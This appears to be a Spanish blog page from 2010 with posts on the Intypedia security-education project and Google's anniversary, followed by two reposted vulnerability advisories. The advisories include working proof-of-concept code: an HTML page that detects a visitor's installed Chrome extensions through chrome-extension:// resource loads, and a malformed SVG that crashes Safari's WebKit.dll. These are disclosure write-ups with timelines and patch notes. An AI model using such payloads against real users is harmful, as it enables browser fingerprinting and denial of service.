Intypedia, la enciclopedia de la seguridad

30 septiembre 2010 Publicado por cLimbo 0 comentarios
Ayer se presentó el proyecto Intypedia, “La Enciclopedia de la Seguridad de la Información”, una iniciativa de Aula Virtual dentro de la Red Temática de Criptografía y Seguridad de la Información CRIPTORED (formada por 219 universidades de todo el mundo y 300 empresas de sector TIC y la seguridad de más de 20 países) con el apoyo económico de GMV y el impulso de la Universidad Politécnica de Madrid (UPM). Este nuevo proyecto de CRIPTORED tiene como objetivo el convertirse en el Aula Virtual y sala de estudio en Internet de miles de estudiantes, profesionales e internautas en general, interesados por los temas de la seguridad de la información.


Bajo el paraguas de este proyecto, se producirán vídeos de corte formativo sobre seguridad de la informaciónu que serán accesibles de el canal de YouTube de la UPM y desde la propia plataforma Intypedia, por lo que todo el material generado será accesible de manera gratuita. Las lecciones en video, presentadas por dos personajes virtuales, Alicia y Bernardo, darán un repaso a los temas más importantes de la seguridad de la información, usando como base textos y lecciones aportadas por distinguidos expertos, miembros de la Red Temática. Cada lección en vídeo se acompaña de diversos documentos: el guión del vídeo, una presentación con diapositivas relativas a la teoría expuesta en el vídeo y un boletín de ejercicios, para afianzar conocimientos; de hecho, la primera de las lecciones está ya disponible para su visuaización y descarga (la historia de la criptografía, muy recomendable).

Me parece, la verdad, una iniciativa muy interesante, porque, aunque imprescindible, no existe mucho material de consulta gratuita en la red relativo a seguridad de la información; a pesar de su importancia, es un tema poco tratado. Este tipo de iniciativas, sin ser un máster en seguridad, cumplen una función muy importante: la concienciación de los usuarios. Es más, parece que empieza a haber cierto movimiento, agitación más bien, alrededor de la seguridad y su importancia, por ejemplo, en entornos corporativos. Igual que usamos el concepto de “cultura de empresa”, tendríamos que adoptar uno similar en los entornos corporativos, una “cultura de seguridad” en la que concentremos buenas prácticas, procedimientos y medidas a tomar para salvaguardar la información.

La verdad es que esta concienciación por la seguridad es muy interesante, de hecho, para muchas empresas es toda una oportunidad. La seguridad de la información no es un tema que llevan “unos cuantos locos” que sólo piensan en instalar firewalls, es un compromiso, no sólo de la dirección si no que de toda la empresa. Es interesante cómo desde las propias administraciones se empieza a fomentar entre los usuarios la cultura de la seguirdad de la información. Me alegra mucho poder estar informado a través de iniciativas como INTECO-CERT o del joven AndaluciaCERT, centros de respuesta a incidentes de seguridad impulsados por la administración, el primero con orientación a toda la ciudadanía y el segundo, orientado a la propia administración andaluza.

La concienciación sobre la importancia de la seguridad y el establecimiento de una serie de buenas prácticas son algo fundamental y casi prioritario en cualquier empresa. Es uno de los pilares que soportarán la continuidad de nuestro negocio, por tanto, una buena formación de los usuarios será fundamental.



Vía | Bitelia

Etiquetas: , , ,

12 aniversario de Google

27 septiembre 2010 Publicado por cLimbo 0 comentarios
Con este logo tan particular nos saluda hoy el portal de búsquedas de Google, ¿la razón? La celebración del duodécimo aniversario desde su creación. El dibujo que hace de doodle de hoy es obra del artista norteamericano Wayne Thiebaud y lo podemos encontrar tanto en la página internacional como en las locales de todo el mundo.

De modo que fue tal día como hoy hace 12 años que se fundó la empresa del buscador más famosa del mundo… bueno, no exactamente. Si hacemos la consulta en la Wikipedia, encontraremos una fecha diferente, el 4 de septiembre, como día en que Larry Page y Sergey Brin registraron la empresa. Lo que sucede es que la empresa decidió cambiar de fecha en varias ocasiones este aniversario, hasta que en 2005 fue fijado definitivamente el día 27 de septiembre.

Lo verdaderamente significativo en toda esta noticia es que en tan sólo 12 años Google ha pasado de ser una empresa pequeña, una startup a la sombra de otros motores de búsqueda como Altavista, a ser el rey indiscutible de este sector tan lucrativo de la red. No conforme con eso, los de Mountain View han sabido diversificar sus líneas de negocio abarcando otros muchos sector complementarios como Google Maps, Google Docs, Android, Chrome, etc. De modo que es capaz de ofrecer una respuesta completa a muchas de las necesidades tecnológicas del usuario actual.

Desde Bitelia, y personalmente un servidor que escribe estas líneas y que hace de editor de asuntos Google en este blog, no podemos menos que dar la enhorabuena a la empresa esperando que sigan alegrando el panorama digital actual, que gracias a sus muchos colores es mucho más divertido de lo que lo era antes.




Vía | Bitelia

Etiquetas: ,

Google Chrome Instaled extensions arbitrary detection

15 septiembre 2010 Publicado por cLimbo 0 comentarios
######################################################
Google Chrome Instaled extensions arbitrary detection
URL afectada: http://www.google.com
Reportado por: http://lostmon.blogspot.com/2010/09/google-chrome-instaled-extensions.html
Notificación al afectado: Sí Confirmación del afectado: Sí Exploit: Sí
######################################################

Cambio de registro: http://googlechromereleases.blogspot.com/2010/09/stable-and-beta-channel-updates.html

#########
Resumen
#########

¿Cuánta seguridad tiene usar extensiones?

Un atacante puede acceder a través de un iframe a las extensiones de recursos (cabe destacar que en este momento no han encontrado una forma de información alterada de las prórrogas).

>iframe
src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/options.html"<>/iframe<

(por ejemplo)

un usuario remoto puede modificar este documento web y llamándolo conel tag meta "base" en un formato incorrecto del doc...

<BASE HREF="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/">


Por lo que llego a la conclusión de que las extensiones chrome necesitan mejorarse y evitar el acceso no interno de recursos de las páginas web externas .. (optativas de usar file:/// y otros controladores de otros protocolos son también seguros de usar y no dan acceso a los recursos internos contra las señales externas de documentos web ...)

Así el controlador de chrome-extension puede ser utilizado para obtener extensiones instaladas en el navegador del cliente ... y con posiblidad de ver ellos si cualquier extensión es vulnerable a algo, puesto que esta información puede ser utilizada para explotar esta extensión ...

En las extensiones en modo incógnito puede ser fácil de detectar.

###########################
Ejemplo de PoC
###########################

<html>
<head>
<title>Chrome extensions detector PoC By Lostmon</title>
<body>
<p><img src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/icon_128.png"
onLoad="document.write('<br /><b>you have instaled Gmail checker
plus</b>');" onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bfbameneiokkgbdmiekhjnmfkcnldhhm/icons/16.png"
onLoad="document.write('<br /><b>you have instaled Web Developer</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://bjcpobipejlbogodeiendpdgcdambjgo/icons/icon-lightning-16.png"
onLoad="document.write('<br /><b>you have instaled My Shortcuts</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bmagokdooijbeehmkpknfglimnifench/firebug.jpg"
onLoad="document.write('<br /><b>you have instaled Firebug</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://ckibcdccnfeookdmbahgiakhnjcddpki/images/browseraction.png"
onLoad="document.write('<br /><b>you have instaled Webpage
Screenshot</b>');" onError="document.write('<br /><b>File not
found</b>');"></p>
<p><img
src="chrome-extension://dgpdioedihjhncjafcpgbbjdpbbkikmi/images/empty_preview.png"
onLoad="document.write('<br /><b>you have instaled Speed dial</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://jfchnphgogjhineanplmfkofljiagjfb/icon_16_16.png"
onLoad="document.write('<br /><b>you have instaled Downloads</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
</body>
</html>

####################EOF##########################

##############
Descubierto
##############

Descubierto:27 may 2010
Notificado:01 jun 2010
Parcheado:02 sep 2010
Publicado: 07 sep 2010

#######################€ND ########################

Thnx To cLimbo for his patience and support.

Atentamente:
Lostmon (lostmon@gmail.com)
-----

thz Lost ;-)
Etiquetas: , , ,

Safari for windows Invalid SGV text style Webkit.dll DoS

02 septiembre 2010 Publicado por cLimbo 0 comentarios
###################################################
Safari for windows Invalid SGV text style Webkit.dll DoS
Afectado: www.apple.com
Reportado por: http://lostmon.blogspot.com/2010/08/safari-for-windows-invalid-sgv-text.html
Notificación al afectado: Sí Exploit disponible: Sí
###################################################

Safari Browser (en windows) es vulnerable siendo propenso a Denegaciones de Servicio, este problema afecta a webkit.dll y se bloquea al tratar de hacer que Safari abra una imagen SGV con un tamaño grande de fuente.

############
versiones
############

Safari para windows 5.0.1 (7533.17.8)
en windows 7 ultimate completamente parcheado.

Safari para windows windows 5.0.1 (7533.17.8)
en windows xp home sp3 completamente parcheado.

############
Línea de tiempo
############

Descubierto:19-08-2010
Notificado al vendedor:25-08-2010
Respuesta del vendedor:26-08-2010
Publicado: 30-09-2010

####################
PoC
####################

Guarda el código como "image.svg" y ábrelo con Safari, mirad como se añaden algunos píxeles "extra" en estilo de la fuente en el tamaño del texto.

################ BOF image.svg ######################

<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" version="1.1">
<defs>
<mask id="crash">
<polygon points="155.5,45.6146 181.334,119.935 260,121.538 197.3,169.074
220.085,244.385 155.5,199.444 90.9154,244.385 113.7,169.074
51,121.538 129.666,119.935"
transform="matrix(1 0 0 1.04643 1.9873e-014 -6.73254)
translate(-52.381 -37.9218)"
style="fill:rgb(255,255,255);stroke:rgb(0,0,0);stroke-width:1" />
</mask>
</defs>

<g mask="url(#crash)" style="font-family:Verdana; font-size: 10pt; fill:red;">
<text x="80" y="80" style="font-size:111000000pt; fill:pink;">Safari</text>
<text x="0" y="130" style="font-size: 60pt; fill:pink;">Now</text>
<text x="20" y="190" style="font-size: 60pt; fill:pink;">Crash</text>
</g>

</svg>

###############EOF####################

################# €nd ###############

Thnx To cLimbo for his patience and support.

Atentamente:
Lostmon (lostmon@gmail.com)
---
thz Lost ;-)
Etiquetas: , , , , , ,
Suscribirse a: Entradas (Atom)